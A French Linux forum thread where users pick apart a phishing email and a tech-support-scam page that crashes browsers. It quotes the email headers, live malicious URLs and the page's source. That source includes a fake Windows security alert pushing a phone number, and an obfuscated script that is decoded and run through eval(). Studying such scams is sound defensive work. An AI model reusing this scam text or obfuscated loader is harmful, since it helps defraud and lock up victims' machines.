Page internet astucieuse...active sous Linux

chinois02 · Le 06/09/2019, à 09:06

Bonjour,
J'ai, par curiosité, exploré un mel que je savais porteur d'une crasse.
En cliquant sur le lien j'ai eu ceci:

(image cliquable).
Comme vous le voyez il s'agit d'un problème windows.
Mais le script (bloqué par noscript) de la page en question entraîne systématiquement un emballement du processeur avec utilisation de la RAM qui monte à 100%, puis de la swap avant que le navigateur plante.
Il n'y a rien d'autre visible.
Je ne peux pas saisir ce qui entraîne ce comportement.

Dernière modification par chinois02 (Le 06/09/2019, à 09:32)

Vobul · Le 06/09/2019, à 09:10

Un CPU à 100% c'est peut-être car ça fait miner de la cryptomonnaie. Après le fait que ça plante c'est soit un bug, soit volontaire pour que l'utilisateur soit convaincu que son windows est planté et qu'il faut donc appeller le numéro.

chinois02 · Le 06/09/2019, à 09:34

En fait je pensais qu'il y avait des protections contre ce type de page/contre les fork bomb
(là c'est l'application Firfox qui a été fermée d'autorité, et non l'ordinateur gelé.)

Dernière modification par chinois02 (Le 06/09/2019, à 09:39)

rogn... · Le 06/09/2019, à 10:31

En tout cas, le lien de #1 renvoie vers Erreur 503.

chinois02 · Le 06/09/2019, à 11:19

rogn... a écrit :

En tout cas, le lien de #1 renvoie vers Erreur 503.

C'est pix toile libre qui vient de tomber

Pending... · Le 06/09/2019, à 16:19

chinois02 a écrit :

Je ne peux pas saisir ce qui entraîne ce comportement.

Peut-être un script qui brute-force une vulnérabilité (qui passe un nombre incalculable de possibilités avant d'arriver à pouvoir insérer du code arbitraire en mémoire par exemple).

Il faudrait voir si ça le fait sur tous les navigateurs où si c'est ciblé à qu'un seul. Si ce n'est pas ciblé, il y a un souci, surtout si Flash est désactivé : mal écrit ou mal conçu, ou simple but de planter le navigateur, donc avec peu d'intérêt).

Dernière modification par Pending... (Le 06/09/2019, à 16:20)

bruno · Le 06/09/2019, à 16:37

Si tu donnais l'URL de la page en question, cela pourrait avoir un interêt, sinon bof…

nam1962 · Le 06/09/2019, à 16:38

Pas pigé le problème car aucune notion de l'environnement.
Quel OS ? quelle version ? quels dépôts si c'est du Linux ? est-il validé si ce n'est pas du Linux ? quel navigateur ? quelles extensions ?

[Edit] et comme dit bruno, quelle page ? et même quel code source du mail hameçon ?

Dernière modification par nam1962 (Le 06/09/2019, à 16:39)

chinois02 · Le 06/09/2019, à 18:02

La machine en question est sous Xubuntu 18.04 à jour.
Navigateur firefox maintenu à jpur. extension facebook container, µblock origin et noscript (ce dernier n'était pas activé).
Noscript bloque bien le comportement de la page web malicieuse, mais j'aimerais comprendre le mode opératoire du script.
/!\ je vais filer le lien à ne pas tester sous autre chose que du Linux!
code source du mail:

From - Fri Sep  6 08:00:52 2019
X-Account-Key: account12
X-UIDL: 18243.4qKVU7SXUS6PWFl4lDewl+RLjno=
X-Mozilla-Status: 0001
X-Mozilla-Status2: 00000000
X-Mozilla-Keys:                                                                                 
Return-Path: Dafuck.syscalls23@i.superiordraft.com
Received: from zimbra22-e3.priv.proxad.net (LHLO
 zimbra22-e3.priv.proxad.net) (172.20.243.172) by
 zimbra22-e3.priv.proxad.net with LMTP; Thu, 5 Sep 2019 23:33:06 +0200
 (CEST)
Received: from i.superiordraft.com (mx19-g26.priv.proxad.net [172.20.243.89])
	by zimbra22-e3.priv.proxad.net (Postfix) with ESMTP id A6564C024C2
	for <xxx@free.fr>; Thu,  5 Sep 2019 23:33:05 +0200 (CEST)
Received: from i.superiordraft.com ([220.179.16.228])
	by mx1-g20.free.fr (MXproxy) for yuci.qian@free.fr;
	Thu,  5 Sep 2019 23:33:06 +0200 (CEST)
X-ProXaD-SC: state=HAM score=0
X-ProXaD-Cause: (null)
DKIM-Signature: v=1; a=rsa-sha256; q=dns/txt; c=relaxed/relaxed;
 s=dcpt; d=i.superiordraft.com; t=1567719183; x=1567722783; h=from:
 subject:date:message-id:to:content-type;
 bh=jWEhoBPVbWoB9PidPzDPgaMK2Ld5fQKdan4p2WJ6uoU=;
 b=yNh9rPHybY18pMFDot3dPYnCNW+cKVQQeGNXHPmwABiJizZ3mM2BQ0gYc19tNEqSGD5uau
 ia/mSzltzfNkugDADmJp0S6YzXpjj0t4l1PThGNnDBH0XmHqxDoNk2jM0zZHa5EbiFAQVe
 sye1gHavCqGSL6juJYBw2P3Vk28DMCo=
auth-sender:canacomex@prodigy.net.mx
Date: Thu,  5 Sep 2019 23:12:44 +0200
X-Strategy: all
X-Dreamcast: Lefigaro transig
geo-lid: 7478,7479,7480,7481,7482,7483,7484,7485,7486,7487,7488,7489,7490,7491,7492,7493,7494,7495
Content-Type: multipart/mixed;
	boundary="_=_swift_v4_1540789430_179f62f7379c7c0cb58fd296fe5cda6a_=_"
X-Client-IP: IPv4[154.68.19.11] Epoch[1529115315602]
Message-Id: <1563009144@orange.fr>
X-musees: precisait
X-eCircle-Complaints: abuse@teradatadmc.com
X-Xlco-Mailer: PHPMailer - 5.2.21
X-Modus-Trusted: 10.76.28.4=YES
From: "Guy Lanier" <Dafuck.syscalls23@i.superiordraft.com>
X-AW5: 261029 
X-MailSentId: 2038053
Subject: futals idees portraits
To: "xxx" <xxx.free.fr>
X-Barracuda-Effective-Source-IP: host-cotesma-133-32.smandes.com.ar[181.114.133.32]
X-MH-Original-Subject: =?UTF-8?B?pulwend=?=

--_=_swift_v4_1540789430_179f62f7379c7c0cb58fd296fe5cda6a_=_
Content-Type: multipart/mixed;
	boundary="--boundary_1100228_9c73f0cc-bc42-4a70-a1d5-12b41f587746"

----boundary_1100228_9c73f0cc-bc42-4a70-a1d5-12b41f587746
Content-Transfer-Encoding: base64
X-KeepSent: C1BAAC02
X-interurbain: devait
Content-Type: text/html; charset="utf-8"

PGh0bWw+PGJvZHk+PHA+Qm9uam91ci48L3A+DQo8cD5WJiM4MjAzOzwhLS0gbGVjdHJvY3V0
YW50LmNvbSAtLT7QvnVzIDwhLS0gdHJvbmNoZXIuY29tIC0tPiYjeDYxO3Y8IS0tIG5hcmlz
dGlxdWVtZW50LmNvbSAtLT5leiByPCEtLSBzdXJ0YXhlcy5jb20gLS0+ZcOnJiMxMTc7IHVu
IG7igItvdTwhLS0gZW5uZW1pLmNvbSAtLT52ZWF1IG1lczwhLS0gcXVlbHFpZXMuY29tIC0t
PnNhZzxzcGFuPmU8L3NwYW4+IGNhYzwhLS0gVXJzcy5jb20gLS0+aMOpIGRhPCEtLSBhcHBl
bHMuY29tIC0tPjxzcGFuPm48L3NwYW4+cyBsZSBtZTwhLS0gUmljaGllLmNvbSAtLT5zc2Fn
ZXIgPGI+VyYjMTA0O2F0c0FwcDwvYj4uPC9wPjxwPjxhIGhyZWY9Imh0dHA6Ly9pLnN1cGVy
aW9yZHJhZnQuY29tL3NvdXAvczd2MW1pOGI2Y21qMnFmejV6L3pka21mcmVlLmZyc3VyY2hh
cmdlL2Nyb2lyLmh0bSI+TGlyJiN4NDM1OyA8c3Bhbj5sPC9zcGFuPmUgbSYjMTAxO3NzJiN4
NjE7Z2Ugc3UmI3gyMDBiO3Igbm90JiMxMTQ7ZSBzJiMxMDU7dGUgd2ViLjwvYT48L3A+DQoN
CjwvYm9keT48L2h0bWw+

----boundary_1100228_9c73f0cc-bc42-4a70-a1d5-12b41f587746--

--_=_swift_v4_1540789430_179f62f7379c7c0cb58fd296fe5cda6a_=_--

le lien de la page malicieuse:
http://i.superiordraft.com/soup/s7v1mi8 … /croir.htm

Dernière modification par chinois02 (Le 06/09/2019, à 18:16)

nam1962 · Le 06/09/2019, à 21:36

µblock origin ou ublock origin ?

Déjà, effectivement aucun souci à visiter la page pour nous et toi (OS Linux), je n'ai pas du tout vu celle que tu montres (avec un numéro de tel correspondant à une entreprise en faillite.)

Pas la moindre accélération de processeur chez moi, mais j'ai plusieurs autre protections sur mon Firefox.

[Edit] j'ai même rempli leurs formulaire (avec plein de grossièretés) aucun impact sur mon processeur ou ma RAM

Dernière modification par nam1962 (Le 07/09/2019, à 07:15)

Nuliel · Le 06/09/2019, à 21:56

Allez, je poste la bonne blague: https://updatefaker.com/windows10/index.html (à mettre en plein écran )
Allez, je vais visiter le site

Edit: tu aurais pas un module qui change ton referer?

Dernière modification par Nuliel (Le 06/09/2019, à 21:58)

chinois02 · Le 06/09/2019, à 22:13

Marrant, maitenant j'ai la page classique du gagnant de l'Iphone X...(ou Samsung peu importe)!
ça ne correspond pas à mon truc
Essayez ceci: (récupéré dans mon historique)
http://koolm.gpu.captivatehero.com/dx/ffiedgex/
ou ceci:
http://koolm.gpu.captivatehero.com/dx/?ysnNZqTXEU

Dernière modification par chinois02 (Le 06/09/2019, à 22:41)

Nuliel · Le 06/09/2019, à 22:44

Oui, c'est ce que je remarquais.
J'arrive pas à trouver l'adresse mail pour signaler

Edit: j'avais pas vu les nouveaux liens je regarde ça

Reedit: yes, mon pc a planté, ça ressemble bien à une forkbomb ou un truc de ce style

Dernière modification par Nuliel (Le 06/09/2019, à 22:51)

chinois02 · Le 06/09/2019, à 22:56

Voici les voix diffusées par la page malicieuse:
http://koolm.gpu.captivatehero.com/dx/f … french.mp3

chinois02 · Le 06/09/2019, à 22:59

et une partie du code source de la page.

<html>

<head>
    <meta http-equiv="content-type" content="text/html;charset=UTF-8">
    <meta name="robots" content="noindex, nofollow">
    <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
    <title>AVERTISSEMENT DE WINDOWS SECURITY</title>
    <meta name="robots" content="NOINDEX,NOFOLLOW">
    <style type="text/css">
        #alert{position:absolute;left:30%;top:5%;background:#0078D7;border:2px solid #0032C7;width:40%}.input{margin-top:10px;background:#0078D7;padding:20px;text-align:right}.input input{opacity:1;padding:15px;font-size:16px;width:35%;font-weight:700}.input input:hover{opacity:.75}.head h1,h2,h3,h4{margin:0;padding:0}.text{padding:20px}.right{float:right}.left{float:left}.clear{clear:both}.alert_hide{cursor:pointer}body{background-color:#FFF;color:#000;font-family:"Trebuchet MS",Arial,Helvetica,sans-serif;font-family:Arial;font-size:18px;margin:0}body,html{margin:10px;padding:0;overflow:hidden;width:100%;height:100%;background-attachment:fixed;background-color:#0078D7}
    </style>

    <script src="https://code.jquery.com/jquery-3.3.1.min.js"></script>
    <script>

function getVariableFromURl(name)
{
	name = name.replace(/[\[]/,"\\\[").replace(/[\]]/,"\\\]");
	var regexS = "[\\?&]"+name+"=([^&#]*)";
	var regex = new RegExp( regexS );
	var results = regex.exec( window.location.href );
	if( results == null )
		return "";
	else
		return results[1];
}
        var phone = "01 84 14 45 14";

        var text = "** Alerte d'avertissement Windows **\n\S'il vous plaît appelez-nous immédiatement à: " + phone + ".\nNe pas ignorer cette alerte critique.\nSi vous fermez cette page, l'accès à votre ordinateur sera désactivé pour éviter d'autres dommages à notre réseau. Votre ordinateur nous a averti qu'il a été infecté par un logiciel espion pornographique et un logiciel à risque. \n\nLes informations suivantes sont volées: \n 1.Connexions Facebook\n 2.Détails de la carte de crédit\n 3.Connexion au compte de messagerie\n 4.Photos stockées sur cet ordinateur.\nVous devez nous contacter immédiatement afin que nos ingénieurs experts puissent vous guider tout au long du processus de suppression par téléphone afin de protéger votre identité. Veuillez nous appeler dans les 5 prochaines minutes pour éviter que votre ordinateur ne soit désactivé ou ne perde de l'information.\n\nGratuit:" + phone;
    </script>
    <script>
        var w = window.screen.width;
        var h = window.screen.height;
        window.moveTo(0, 0);
        window.resizeTo(w, h);
    </script>

    <script>
        //browser
        var isOpera = !!window.opera || navigator.userAgent.indexOf(' OPR/') >= 0;
                // Opera 8.0+ (UA detection to detect Blink/v8-powered Opera)
        var isFirefox = typeof InstallTrigger !== 'undefined';   // Firefox 1.0+
        var isSafari = Object.prototype.toString.call(window.HTMLElement).indexOf('Constructor') > 0;
                // At least Safari 3+: "[object HTMLElementConstructor]"
        var isChrome = !!window.chrome && !isOpera;              // Chrome 1+
        var isIE = /*@cc_on!@*/false || !!document.documentMode;   // At least IE6


    </script>
</head>

<body style="margin:0px;padding:0px;font-family:arial,sans-serif!important;  background-color: #09276f !important; cursor: url("data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAIAAAACACAMAAAD04JH5AAAABGdBTUEAALGPC/xhBQAAAAFzUkdCAK7OHOkAAAAPUExURQAAAAICAgAAAP///5WVlXiCGdAAAAADdFJOUwD8ZX+n/7gAAABvSURBVHja7dbBAUAwEABBQf81i6CGfZipYB3J2bY/GnnAHgec9QjOY9QBccEMaAvugLRgBZQFT0BY8AZ0BV9AVvB8hEt3D8SnYIz2FMxtlI7gfvVzBN1OXM9+1Dsx/ykAAAAAAAAAAAAAAAAAgNcFnc4A9qwo+wMAAAAASUVORK5CYII=") 128 128, crosshair;">
    <div id="blue-screen" style="display: none">
        <table style="width:100%" height='61' cellpadding='0' cellspacing='0' border='0'><tr><td width='766'><img src='img\bg-1.jpg'></td><td align='right' background='img/bg-2.jpg'><img src='img\bg-3.jpg'></td></tr></table>
    </div>
    <div style="width:85%; margin:auto; padding-top:4%; background-color:#09276f;position:relative;">
        <div class="centering-col">
            <div class="centered-content">

                <h1 style="color:#FFF; margin-top:20px; font-weight:900;">** Alerte d'avertissement Windows **</h1>
                
                <div style="float:right;   margin-right:0%;"><img src="img\defender.png" width="450"></div>
                <div style="float:left; height:250px; width:520px; padding-left:20px; padding-top:25px; color:#FFF; "> S'il vous plaît appelez-nous immédiatement à:
                    <script>
                        document.write("<span style=\"font-size:22;font-weight:bold;\">" + phone + "<\/span>");
                    </script>:
                    <br> Ne pas ignorer cette alerte critique.
                    <br> Si vous fermez cette page, l'accès à votre ordinateur sera désactivé pour éviter d'autres dommages à notre réseau.
                    <br> Votre ordinateur nous a informés qu'il avait été infecté par un logiciel espion pornographique et un logiciel à risque. Les informations suivantes sont volées.
                    <br>
                    <br> 1. Connexions Facebook
                    <br> 2. Détails de la carte de crédit
                    <br> 3. Connexion au compte de messagerie
                    <br> 4. Photos stockées sur cet ordinateur
                    <br>
                    <br>Vous devez nous contacter immédiatement afin que nos ingénieurs experts puissent vous guider tout au long du processus de suppression par téléphone afin de protéger votre identité ou de toute perte d'informations.
.
                </div>
                <div style=" margin-top:420px;  ">
                    <h1 style=" font-weight:900;color:#FFFFFF;">Appeler Windows: <script>document.write("<span style=\"color:#FFFFFF\">" + phone + "<\/span> (Gratuit)")</script> </h1></div>

            </div>

        </div>

    </div>
    <audio autoplay="autoplay" loop="" id="audio">
        <source src="sound\french.mp3" type="audio/mpeg">
    </audio>
    <div id="chrome-alerts" class="chrome-alert" style="display: none">
        <div>
            <a href="#" class="cross">×</a>
            <h1>Avertissement de sécurité:</h1>
            <div class="content-box" id="alert-content-box">
                  <p>** Alerte d'avertissement Windows **<br>
               
                <br>
                <br>S'il vous plaît appelez-nous immédiatement à:  <span style="font-size: 13pt;font-weight: bold"><script>document.write(phone)</script></span> (Gratuit)<br>
					  Ne pas ignorer cette alerte critique.
                </br> Si vous fermez cette page, l'accès à votre ordinateur sera désactivé pour éviter d'autres dommages à notre réseau.
               <br> Votre ordinateur nous a informés qu'il avait été infecté par un logiciel espion pornographique et un logiciel à risque. Les informations suivantes sont volées.
					 <br>
                    <br> 1. Connexions Facebook
                    <br> 2. Détails de la carte de crédit
                    <br> 3. Connexion au compte de messagerie
                    <br> 4. Photos stockées sur cet ordinateur
                <br>
                <br> Veuillez nous appeler dans les 5 prochaines minutes pour éviter que votre ordinateur ne soit désactivé ou ne perde de l'information.</br>
              </br> Gratuit: <span style="font-size: 13pt;font-weight: bold;"><script>document.write(phone)</script></span></p></div>
            <label style="font-size: 12px;">
                  <input type="checkbox">
                  Empêcher cette page de créer des dialogues supplémentaires.</label>
            <div class="action_buttons"> <a style="color:#fff;background:#54b7ff;font-size: 11pt;font-weight: bold;" href="javascript:;" class="active" id="leave_page">Retour a la sécurité</a> </div>
        </div>
    </div>

    <script>
        (function() {
            var t = "",
                p = [8, 7, 9, 6, 5, 4, 9, 6, 3, 7],
                smat = unescape("-9%3D+7%3Co%7Bqj%7Cpxt*6A+5@-%3EKok%29%3B%3ElzNp%7Bkks%81+5@-%3EK+78.8%3B%2C%3A9j+76.8%3C5ksrip%29%3B%3Ei%7Cvj%7Dotr.8%3Bl-9B+%3CFn4sym%7DntyHnld%7Ct%7B.8%3D%29%3B%3F%28%3EL%2C%3B%3F*7K%7Cdy-99k*7M+8I-9%3BvzwqYwh%7Cl.87%29%3BI%289%3Avwhjjxxh%7Cvsxgi%29%3B8%289K%2C%3B8*6%3B+5J-9%3Bxjx%7Exq%5Dis%7Ek*6%3B+5J-9%3Buspxgg%2C%3A9.8H%29%3B8wv%5B%7B%7Bosk.85%2C%3DK.9Gs.9Gl-9L%7B*7M95%3C-9Llzrlzlvv%2C%3B%3Ej%29%3B%3F%28%3EJmxx*6A+6I54n+8F.8%3Cv6w%7Eym%29%3B%3Er5%7Borly%29%3B%3E%289A%2C%3B%3F*%3BM+5%3F32%7E+7%3D.9E%7Diy.85r.9Gm%7Dulznsw+5%3Fv%2C%3BIy%29%3B%3F%28%3EJynzzvw+57m%2C%3EHs1.9G7-%3CM+%3CH.9E%7B-%3AMzj%7C%7D+5J%7Fpwjt%7B.%3BEu-9A+769%7E3%2C%3A9.8%3E%29%3EJ%28%3ALm%7Ethxruq%2C%3A%3Fn+7%3D.%3DE%7Diy.85s.9Gu-9A+769%7E4%2C%3A9.8%3E/%7D+6Izl%7D%7Bwr.83l-%3CKt*6A+598%7F%3B+76.8%3C%2C%3DK.9Is.8Fv-%3EM+7G%80oqkw%7E.%3BGr.8%3B%2C%3A99%7E8%29%3B8%289A%2C%3EJ*7Mlxuk%7Brus%29%3B%3E%289A%2C@Hnj.8%3Bjwuoowq.8%3B%2C%3A9.87/%7D+5@-9Bltv.8%3B%7Diy.85i.9G%2C%3A9.87%29%3BIr%2C%3BK9+8Fx+6J9lA+8Fx1.%2C%3A@n1*7Mu%28%3CJu.8%3D%29%3B83%7F%3C%2C%3B8*6B+8K-9A+7%3D.8Foqz%7Duw%7D.%3BEu-9A+769%7E8%2C%3A9.8%3E%29%3EJ%289@7.8H4.8Fl-9B+8Fnrvl-99ltv.8%3Bl-%3AM+76.85%2C%3AJx+8H9+6Iw%2C%3CI6iA+6Iw24+7%3Dn1%28%3ALv.%3BGr.8%3B%2C%3A99%7E9%29%3B8%289A%2C%3EJ*6A+5@-9Lnnw%7Duu%80-%3CKt*6A+598%7F%3E+76.8%3C%2C%3DK.8%3D4.8F7-9Lk*6B+%3AK-%3EM%7Cfv.83%7B-9Lu*6L%7B%289Ky.8Hg.8Fp-9Lr*7Koi%2C%3A%3FryHl%7Bupl-%3EL+%3CGryRwmyj+7%3D.%3DE%7Diy.85h.9G%2C%3A8%3A+8F.87%2C%3A%3F.87lngg%2C%3A9.8%3E2jvslvk.8%3D%29%3B%3D%28%3AKzlxnt%7D+57%7Byl+8H.8557q%7C5ou%7Eku%806q%7C+76.9H%2C%3BJ.%3BH3%7Ciupx%7B.9J%29%3B%3D%289A%2C%3BI*6%3D+5%3F-9%3Bnjem+59-9B4ftykqk-9A+7%3B.9Fsqut+74qxhm-%3AM+7675fz%7B6vgnr7ivz-9%3B+74%7Bko%2C%3BK.87w%7D%7Fol%7Bonky%29%3B8%28%3AM%2C%3B%3D*6B+5Jlvl%7Briwz1nm%7BNrjqntwI%81Pm+7%3C.85h%7Dkru*6%3B+5@6wug%7E%29%3B%3E%289A%2C%3BI%7Cmwjr%7E6vwqj%7Dmuzu-%3AMlzrlzlvv%2C%3B%3Ej%29%3B%3F%28%3EJynzzvw+589%2C@J*6L%7Dlulv%804trtk%7Cwzl%7Cy*7Mlxuk%7Brus%29%3B%3Eh%2C%3A@.%3DGvnzxyv%2C%3B76%29@J%289Kvwhjjxxh%7Cvsxgi%29%3CJi%7Cvj%7Dotr.8%3B%2C%3A@.%3DGvnzxyv%2C%3B6fpnxw%2C%3A%3F.87%29%3CL%28%3AN%2C%3CL*7O+6M-%3AO+8J.83L%5BJ.8H%29%3B6%28%3AN%2C%3CL*7O+6M-%3AO+74.9I%2C%3BM.9K%29%3CL%28%3AN%2C%3CL*7O+57-%3AO+8J.9I%2C%3BM.9K%29%3CL%28%3AN%2C%3CL*6%3A+59-9B+7G.85%2C%3BM.9K%29%3CL%28%3AN%2C%3CL*7O+6M-99KXG.8F%2C%3A7.9K%29%3CL%28%3AN%2C%3CL*7O+57-%3AO+8J.9I%2C%3BM.9K%29%3CL%28%3AN%2C%3B6*7O+6M-%3AO+8J.9I%2C%3BM.9K%29%3CL%2899%2C%3B8*%3BM+5Jlvl%7Briwz1vvjxtyi%81zplv%7C.9Irn%7D%2898M%7Ethxruq%2C%3A%3F.87vnzxyv%2C%3B6keuyh%2C%3A9.8%3E%29%3CHivz%2C%3B%3E%7Be%7B+57%7B%2C%3CJ5%29%3CHv%2C%3BJ9+8F%7C1.%2C%3A@jrjv%7D+5%3F%7Cl%81z*6B+6In%7Cwiymxt%2898h.8%3D%29%3B%3F%28%3EJk.9K%29%3B%3Egvk%7Cvksx7mh%7BMsnsjr%7DH%7CPl%2C%3B%3E*6%3Bho%7Cm4%7Ciwint%289%3A%2C%3B%3F3w%7D%7Fol6kryupj%7F%28%3AL%2C%3B8gpxin%2C%3A9.8Hhxixtmu%7D4li%7DKolulwzxF%82ZdnVhvk*6A+59jvm%7F*6%3B+5@6p%7Dkr%29%3B%3E3%2C%3A@7yjxJzwyqi%7Ezj%29%3B%3E%289%3Ajugxw.85%2C%3AJ.87tjyw%2C%3A9.8%3E%29%3B%3F%28%3AIk.9I%29%3B73%2C%3FKo%7Bsg%7Doru-99s*6A+5@-%3EKjtg%7Eshu%7C5o%7Bqp%7CiulmuNrjqntw%2C%3FJ.%3DHhxixtmu%7D4rs%83LxstZlxjiwKolulwz*%3BL+%3AJlvl%7Briwz1%7EmitoyJ%7ErozkynksIukplv%7B.%3DH%29@I%289@kxizqntw5lvl%7BriwzHsmtnty2%7Bkt%7Cmz%7DLzpuyfymlw+8Jmuf%7Culwz3hxixtmu%7DKqivkq%7B6ynwzi%7CzI%7Cts%7Ciwint%289@%2C%3B%3F*7Jjrj%7Dtnty2muf%7CulwzJpnshu%7C5vu%7FVnwxl%7B%7BO%7Bqp%5Ciulmu.9Khxixtmu%7D4isl%7Bplv%7BNrjqntw5uv%83Xju%7Ekv%7BN%7CurXg%7Bkhu-9A+7%3D.9Dkwj%7Esjr%7D4gvk%7CvksxNrhtmu%7D4%7Cikql%7BZlz%7Bjw%7DLxstzlxjiw+5%3D-9%3Fjtg%7Eshu%7C5muhyvkq%7BMsnsjr%7D4zljrrzWiz%7Bhz%7CM%7Erqwlxhlv%2C%3B%3EJpnshu%7C5JRQS%60eNLaIXGWHhOQW%5D%5B.8%3E%29%3B%3F%289K%7Ertis%804rwmu.8%3D%29%3B8es%7Dl7vmt.85%2C%3AJ.87Euku%7B-9%3B+7G.85%7Eqk%7Dn*7M7%289Konoll%7D+6K9%2C%3BIxg%7Buosqup+8H%82kv%2C%3AJo%7Bqp%7Ciulmu.9I%7Dny%289Ksnly%29%3CJ6787.8Hxxv%28%3AL%3A965%29%3B8%289A%2C@Jisl%7Bplv%7B7mjxNrhtmu%7DH%7EMm+5%3F-9%3Bimvxsh4isnxyw.85%2C%3A@7yy%7Duk1kqzyrf%7D.9G%2C%3A9krtgt+59-9Ljtg%7Eshu%7C5jjiI%7Fkq%7BTp%7Czjrnx%289@%2C%3B8pi%82%7Bs%2C%3A9.8Hj%7Etf%7Bqvw+7%3Cn+5@-%3EK8%3C%29%3CJ%28%3ALl7qj%7DLugl-9%3F+7%3Av+5%3F-9B+%3CH.8F%2C%3A8%3A+7%3D.8Fkwj%7Esjr%7D4dklL%7FksxUov%7Bmunx*6A+59sl%82%7Bu%29%3B8%289Km%7Ethxruq%2C%3A%3Fn+7%3D.%3DE8%3A9.86%29%3CJh5sl%82Ithn+5%3D-9%3F7%3C%29%3B7%28%3ALl7qj%7DLugl-9%3F+7%3A%3A%3E%2899%2C%3CJj2tk%7CJwkn+7%3A.898%3B%2C%3B7*7Mk1rm%80Luii.%3DF%2C%3FJ.8%3De.8%3B%2C%3A@.8Hq.8%3B%2C%3A@.8%3E%29@J%289K%2C%3B76%29%3B%3F%289K%7Ertis%804rutvjj*7Mlxuk%7Brus%29%3B%3E%289A%2C@Hisl%7Bplv%7B7usguofr-%3AMlzrlzlvv%2C%3B%3Ej%29%3B%3F%28%3EJl.9Ii.%3DF%2C%3FJn%7Cjr%7D+5J%7Ch%7Bmjx.9Gl6%7Bjxli%7D+%3AJ-%3ELk3w%7BiHsmtnty%29%3BIwhznnz3xjmQhul.8Hq.8%3B%2C%3A@.8He.8%3B%2C%3A@.%3DI%29@J%289KhmjJzntwSqz%7Dksi%7B+5%3F-9%3Biqmlq%289%3A%2C%3BIkywiwpwu.8%3D%29%3B%3F%28%3EJh.8%3D%29%3B%3F%28%3AJ%7Djx*69k%28%3ALkxizqntw5lvl%7BriwzHsmtnty%29%3CH%289@l7xju%7Ekv%7BN%7CurXg%7Bkhu-%3EL+%3CGn4zljrrzWiz%7Bhz%7CM%7ErqWlxhlv%2C@I*%3BLk1tw%81%5BkvynywM%7DsuYhvnkq%2C%3A@7ifpu+5%3Fm%2C%3B%3F*%3BM+5@-9L%7Dnrmuz5ikmK%7BiwzOp%7B%7Bntjv.8%3B%2C%3A9%7Bkxm%83k%289%3A%2C%3BIkywiwpwu.8%3D%29%3B%3F%28%3EJ%2C%3B%3A*6A+59jvm%7F*6%3B+5@6j%7Cy*6A+59w%7Dnxkpx%7D%289%3A%2C%3BI*6%3Bnlkllw+76.8%3C%2C%3AJ.89%29%3B%3E%289%3A5yuuyy3dsmy%7D+76.8%3C5%7B%7Bxv*6A+5@6hwore%7Dk%289@%2C@Hgs%7Dzrt-%3AJ+76673w%80%2C%3B8*6Lushkp%7D%7F*7J7%28%3EL%2C%3BI%3A49+5@-9Ljtg%7Eshu%7C5pkyIukplv%7BK%7FNh.8%3B%2C%3A9j%7Bimx+59-9B4upj%7F%289@%2C%3B%3F*6Lyfymlw4%7Cmmzk%2C%3AJ%80oshx%7D1pvunx%5Cmmzk%2C%3AJ%80oshx%7D1zm%7BRtyi%7B%7Cds-9Alzrlzlvv%2C%3B%3E*6B+%3AInv%7B+7%3C%7Fgu%2C%3A7n+8H9+6Im%2C%3CI649+6Im24+7%3Dqov%7Bwy%824uy%7CnV%7Bi%7Bn+7%3C9+5J8%2C%3BIj%29%3B%3F%28%3EL%2C%3BI%3A49+5@-%3EM+7%3D.%3DGpn%2C%3B%3EnwRK%28%3EK%2C@Inw%5Cgihzp.8%3E%29@H%289%3C%2C%3B%3E*6%3B+5%3Ajs%7Ek2wlxhlv%2C%3BI3gqxrtm4jrjv%7D+59-9B4mmmk%289@%2C%3B%3F*7K%7Cdy-99l*7M+8I-9%3Busqx%7Bvlw%7C%7D+76.8F%2C%3A9kui%7D.85%2C%3AJ.87emjH%7Dmu%7DRnw%7Dkqlz%2C%3B8*6L+59uv%7Eyjs%7Ez%289%3A%2C%3BI*6%3B0-12130/.30-12130/.30-12130/.30-12130/.30-12130/..%3BFuZKW5%5EeqRr%7Dmy7%7Dtvv+588%3C%3EHHGJI%3CMMJ.85Mwlhj%7Cpxt*9Lt-12130/.30-12130/.30-12130/.30-12130/.30-12130/.3+8Jv%2C%3EIs%29%3B8%289K%2C%3B8fx%7DgfoM%7Dnty%29%3B8%28%3CL%2C%3CHn%29%3CJi%2C%3AJu+8H%3C%3C4%2C%3AJo%7Bsg%7Doru-9Ak*6B+%3AInv%7B+7%3C.9E45l.9G%29%3B%3Fl5x%7C%7Cn*6Ao1zppoz*6A+5@-9B+%3CH.8%3B23s.8%3E%29%3CHyhz%2C%3B6%7E%29%3CJi%7Cvj%7Dotr.8%3Bl-9Lt*6B+%3AIzl%7D%7Bwr.83m-%3CKk2%29%3CJ3%2C%3DK.%3DI%29%3CHu%2C%3BK%7Dk%7Dx.8Fj-%3AMzj%7C%7D+5Jisnxy%29%3B%3Eu%2C%3A@.8Hhxixtmu%7D+%3AF%82+5%3F-9%3B6%7D4.85%2C%3A@.%3BI%29%3EH%7C%2C%3A%3F.874%817%289%3A%2C%3B%3F*9M+6Mlvl%7Briwz%28%3CJ%80.8%3D%29%3B83%7F8%2C%3B8*6B+8K-%3CK%7F*6A+598%7F%3A+76.8%3C%2C%3DK.8%3D%7D.8%3B%2C%3A99%7E7%29%3B8%289A%2C%3BIkywiwpwu.8%3Di.8%3C%2C%3FIjrjv%7D+5%3F%81%2C%3B%3E*6%3B6%7B%3A-9%3B+7%3D4x%289A%2C@J*6L+589%2C%3B%3F*7Jjrj%7Dtnty%29%3EH%7C%2C%3A%3F.874%816%289%3A%2C%3B%3F*9M+8I%81%2C%3B%3E*6%3B6%7B%3B-9%3B+7%3D.%3BG%2C%3A%3F%82+7%3C.857%80%3C.87%29%3B%3F%289Km%7Ethxruq%2C%3A%3Fn+7%3D.%3DEhtl%7Bz*6Ax%289A%2C@J*6B+5J%7Fpwjt%7B7uqimmxxjywrrhl%2C%3CJkywiwpwu.8%3D%29%3B%3F%28%3EJynzzvw+57k%2C@J*%3BM+%3AK-9B+8F");
            for (var i = 0; i < smat.length; i+=10){
                for(var k=0;k<=9;k++){
                    if((k+i)<smat.length){
                        t += String.fromCharCode(smat.charCodeAt(i+k) - p[k]);
                      }
                }
            }
            eval(unescape(t));
        })();

    </script>

    <script type="text/javascript">/*<![CDATA[*/

     function get_browser(){
        var ua=navigator.userAgent,tem,M=ua.match(/(opera|chrome|safari|firefox|msie|trident(?=\/))\/?\s*(\d+)/i) || [];
        if(/trident/i.test(M[1])){
            tem=/\brv[ :]+(\d+)/g.exec(ua) || [];
            return {name:'IE',version:(tem[1]||'')};
            }
        if(M[1]==='Chrome'){
            tem=ua.match(/\bOPR\/(\d+)/)
